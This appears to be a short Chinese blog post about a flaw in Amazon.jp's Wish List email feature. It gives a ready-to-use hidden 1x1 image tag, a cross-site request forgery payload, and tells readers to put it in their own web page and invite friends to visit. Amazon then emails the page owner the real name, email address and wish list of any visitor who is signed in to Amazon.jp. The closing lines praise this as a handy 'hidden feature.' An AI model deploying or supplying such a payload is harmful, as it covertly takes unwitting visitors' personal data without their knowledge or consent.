Amazon.jp 新功能Wish List出現大漏洞

Amazon.jp為了刺激買氣推出新功能「Wish List」（以下簡稱WL），所謂WL就是把你想要的東西放進清單，系統便會自動將清單裡物品以電子郵件寄送方式通知你的朋友們，透過社群的交流可以互相送禮給喜歡的好友們，而且重點是你完全不用煩惱要送什麼，因為清單裡面就是對方想要的物品。


但這功能出現了一個漏洞，可能會洩漏註冊使用者個人真名、電子郵件及住址。

http://www.amazon.co.jp/gp/registry/send-nudge.html?ie=UTF8&type=wishlist&__mk_ja_JP=&list-type=wishlist&recipients=(自己的電子郵件)&submit=submit （在你填寫對方電子郵件將WL送給某位朋友知道的畫面網址）

對html語法有概念的人應該就知道如何應用了吧。

<img src="http://www.amazon.co.jp/gp/registry/send-nudge.html?ie=UTF8&type=wishlist&__mk_ja_JP=&list-type=wishlist&recipients=xxxxx2%40gmail.com&submit=submit" width="1" height="1"> （xxxxx2%40gmail.com改成你自己的電子郵件位址）

只要將上面語法Insert進你的網頁，邀請朋友瀏覽你的網頁，Amazon就會自動將對方的真名與電子郵件位址，以電子郵件的方式寄信通知你。（但是對方必須要先連上Amazon.jp）

如果對方還已經登入Amazon.jp的話，連個人的WL都會一起通知你，不論對方有沒有設定公開與否。

(Amazon.jp寄來通知的範例) xxxさんからのお知らせ - Amazon.co.jpのほしい物リストについて ＊＊＊さんより、ほしい物リストのご案内をお送りします。ほしい物リストとは、Amazon.co.jpのお客様が、Amazon.co.jpのサイトから欲しい商品を選んで作成するリストのことです。 お友だちやご家族は、あなたが作成したほしい物リストから商品を選び、購入することができます。たとえば、誕生日の少し前にほしい物リストを作成して、プレゼントに欲しい商品をお友だちに知らせたり、恋人や夫婦の記念日用にリストを作ったりしてはいかがでしょう。 Amazon.co.jp でほしい物リストを作成するには、次のリンクをクリックしてください。 http://www.amazon.co.jp/gp/registry/wishlist xxx <abc@xxx.xxx> さんは、Amazon.co.jp を通してこのメッセージを送信しています。 ご不明な点は、当サイトのヘルプページをご覧ください。 ヘルプは こちら

這漏洞被公開之後網路的反應…
「連Google Analytics都無法做到的功能，Amazon竟然辦到了！」
「這隱藏功能超方便的。」